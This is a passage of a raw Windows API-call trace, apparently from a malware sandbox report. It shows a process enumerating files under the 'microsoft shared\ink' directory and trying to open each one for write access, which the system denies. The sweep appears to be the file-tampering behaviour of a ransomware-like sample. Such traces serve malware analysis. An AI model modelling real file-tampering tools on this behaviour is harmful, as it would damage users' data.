InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.707] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d220 | out: hHeap=0x20000) returned 1 [0100.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.707] AreFileApisANSI () returned 1 [0100.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 73 [0100.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cef8 [0100.707] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.707] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0100.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0100.708] AreFileApisANSI () returned 1 [0100.708] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cef8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0100.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85760 [0100.708] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cef8, cbMultiByte=-1, lpWideCharStr=0x85760, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\tipresx.dll.mui") returned 73 [0100.708] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ru-ru\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0100.708] GetFileType (hFile=0x27c) returned 0x1 [0100.708] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85760 | out: hHeap=0x20000) returned 1 [0100.708] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0100.708] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0100.709] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0100.709] CloseHandle (hObject=0x27c) returned 1 [0100.709] AreFileApisANSI () returned 1 [0100.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cef8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0100.709] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85120 [0100.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cef8, cbMultiByte=-1, lpWideCharStr=0x85120, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\tipresx.dll.mui") returned 73 [0100.709] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ru-ru\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.709] GetLastError () returned 0x5 [0100.709] GetLastError () returned 0x5 [0100.709] SetLastError (dwErrCode=0x5) [0100.709] GetLastError () returned 0x5 [0100.709] SetLastError (dwErrCode=0x5) [0100.709] GetLastError () returned 0x5 [0100.710] SetLastError (dwErrCode=0x5) [0100.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85120 | out: hHeap=0x20000) returned 1 [0100.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0100.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0100.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cef8 | out: hHeap=0x20000) returned 1 [0100.710] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.710] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.710] FindNextFileW (in: hFindFile=0x77fd0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x90, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x8c658, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x90, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧⠀")) returned 0 [0100.710] FindClose (in: hFindFile=0x77fd0 | out: hFindFile=0x77fd0) returned 1 [0100.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0100.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0100.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0100.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0100.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0100.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6de98 | out: hHeap=0x20000) returned 1 [0100.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0100.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0100.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x464a8 | out: hHeap=0x20000) returned 1 [0100.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0100.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0100.710] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0100.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0100.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0100.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ed0 [0100.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0100.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ed0 | out: hHeap=0x20000) returned 1 [0100.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0100.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0100.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0100.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f2c8 [0100.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0100.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0100.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a368 [0100.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f2c8 | out: hHeap=0x20000) returned 1 [0100.711] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.711] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.711] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.711] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0100.711] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0100.711] AreFileApisANSI () returned 1 [0100.711] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ShapeCollector.exe", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ShapeCollector.exe", lpUsedDefaultChar=0x0) returned 70 [0100.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0100.711] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.711] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0100.711] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0100.712] AreFileApisANSI () returned 1 [0100.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 70 [0100.712] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8c) returned 0x8abb8 [0100.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x8abb8, cchWideChar=70 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ShapeCollector.exe") returned 70 [0100.712] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ShapeCollector.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\shapecollector.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0100.712] GetFileType (hFile=0x368) returned 0x1 [0100.712] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8abb8 | out: hHeap=0x20000) returned 1 [0100.712] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0100.713] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0100.713] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0100.713] CloseHandle (hObject=0x368) returned 1 [0100.713] AreFileApisANSI () returned 1 [0100.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 70 [0100.713] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8c) returned 0x8a498 [0100.713] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d4d0, cbMultiByte=-1, lpWideCharStr=0x8a498, cchWideChar=70 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ShapeCollector.exe") returned 70 [0100.714] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ShapeCollector.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\shapecollector.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.714] GetLastError () returned 0x5 [0100.714] GetLastError () returned 0x5 [0100.714] SetLastError (dwErrCode=0x5) [0100.714] GetLastError () returned 0x5 [0100.714] SetLastError (dwErrCode=0x5) [0100.714] GetLastError () returned 0x5 [0100.714] SetLastError (dwErrCode=0x5) [0100.714] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a498 | out: hHeap=0x20000) returned 1 [0100.714] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0100.714] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0100.714] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0100.714] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.714] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.714] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa080e8a3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="sk-SK", cAlternateFileName="")) returned 1 [0100.714] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0100.714] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35270 [0100.714] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0100.714] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35270 | out: hHeap=0x20000) returned 1 [0100.714] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0100.715] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0100.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0100.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0100.715] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0100.715] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f2c8 [0100.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0100.715] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e030 [0100.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f2c8 | out: hHeap=0x20000) returned 1 [0100.715] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.715] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.715] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.715] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0100.715] AreFileApisANSI () returned 1 [0100.715] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK", lpUsedDefaultChar=0x0) returned 57 [0100.715] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0100.715] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.715] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.715] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0100.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0100.716] AreFileApisANSI () returned 1 [0100.716] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0100.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69db0 [0100.716] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x69db0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK") returned 57 [0100.716] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sk-sk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.716] GetLastError () returned 0x5 [0100.716] GetLastError () returned 0x5 [0100.716] SetLastError (dwErrCode=0x5) [0100.716] GetLastError () returned 0x5 [0100.716] SetLastError (dwErrCode=0x5) [0100.716] GetLastError () returned 0x5 [0100.716] SetLastError (dwErrCode=0x5) [0100.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0100.717] AreFileApisANSI () returned 1 [0100.717] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0100.717] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a9b0 [0100.717] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x6a9b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK") returned 57 [0100.717] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sk-sk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.717] GetLastError () returned 0x5 [0100.717] GetLastError () returned 0x5 [0100.717] SetLastError (dwErrCode=0x5) [0100.717] GetLastError () returned 0x5 [0100.717] SetLastError (dwErrCode=0x5) [0100.717] GetLastError () returned 0x5 [0100.717] SetLastError (dwErrCode=0x5) [0100.717] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0100.717] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0100.717] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0100.717] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0100.717] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.717] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.717] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.717] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.717] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0100.717] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0100.718] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0100.718] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e3e8 [0100.718] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0100.718] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa080ec25, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="sl-SI", cAlternateFileName="")) returned 1 [0100.718] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0100.718] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0100.718] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0100.718] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ec68 [0100.718] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78690 [0100.718] FindNextFileW (in: hFindFile=0x78690, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa080e8a3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0100.718] FindNextFileW (in: hFindFile=0x78690, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e38953f, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e38953f, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e38953f, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0100.718] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ec68 | out: hHeap=0x20000) returned 1 [0100.718] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.718] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.718] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.718] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0100.718] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.718] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.719] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.719] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.719] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0100.719] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0100.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46828 [0100.720] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e3e8 | out: hHeap=0x20000) returned 1 [0100.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0100.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0100.720] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0100.720] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0100.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0100.720] RtlAllocateHeap 